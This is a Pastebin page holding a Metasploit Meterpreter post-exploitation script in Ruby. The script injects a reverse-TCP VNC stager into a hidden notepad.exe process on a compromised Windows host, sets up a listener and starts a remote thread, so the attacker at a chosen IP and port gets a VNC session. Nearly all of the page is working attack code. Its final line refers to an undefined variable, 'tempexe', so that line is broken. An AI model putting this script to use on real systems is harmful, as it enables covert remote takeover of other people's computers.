Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # $Id: vnc_mem.rb 12-17-2009 hdm $
- #
- # Meterpreter script for obtaining a quick VNC session
- # Hybrid of vnc.rb and vnc_oneport.rb
- # Utilizes memory functions so no file is created
- # All code written by H.D. Moore (hdm)
- # Edited by hhmatt
- #
- session = client
- #
- # Options
- #
- opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],<br>
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4545)"],
- # "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"],
- "-e" => [ true, "The process to run and inject into (default:notepad.exe)"])
- #
- # Default parameters
- #
- runme = "notepad.exe"
- rhost = Rex::Socket.source_address("1.2.3.4")
- rport = 4545
- #autoconn = true
- #
- # Option parsing
- #
- opts.parse(args) do |opt, idx, val|
- case opt
- when "-h"
- print_line(opts.usage)
- return
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- # when "-D"
- # autoconn = false
- when "-e"
- runme = val
- end
- end
- #
- # Create the agent EXE
- #
- print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
- pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
- pay.datastore['LHOST'] = rhost
- pay.datastore['LPORT'] = rport
- raw = pay.generate
- exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
- print_status("VNC stager executable #{exe.length} bytes long")
- #
- # Create a host process
- #
- pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
- print_status("Host process #{runme} has PID #{pid}")
- note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
- mem = note.memory.allocate(1024*32)
- print_status("Allocated memory at address #{"0x%.8x" % mem}")
- print_status("Writing the VNC stager into memory...")
- note.memory.write(mem, raw)
- #
- # Setup the multi/handler
- #
- mul = client.framework.exploits.create("multi/handler")
- mul.datastore['PAYLOAD'] = "windows/vncinject/reverse_tcp"
- mul.datastore['LHOST'] = rhost
- mul.datastore['LPORT'] = rport
- mul.datastore['EXITFUNC'] = 'process'
- mul.datastore['ExitOnSession'] = true
- mul.datastore['DisableCourtesyShell'] = true
- mul.exploit_simple(
- 'Payload' => mul.datastore['PAYLOAD'],
- 'RunAsJob' => true)
- #
- # Execute the agent
- #
- print_status("Creating a new thread within #{runme} to run the VNC stager...")
- note.thread.create(mem, 0)
- print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
- proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement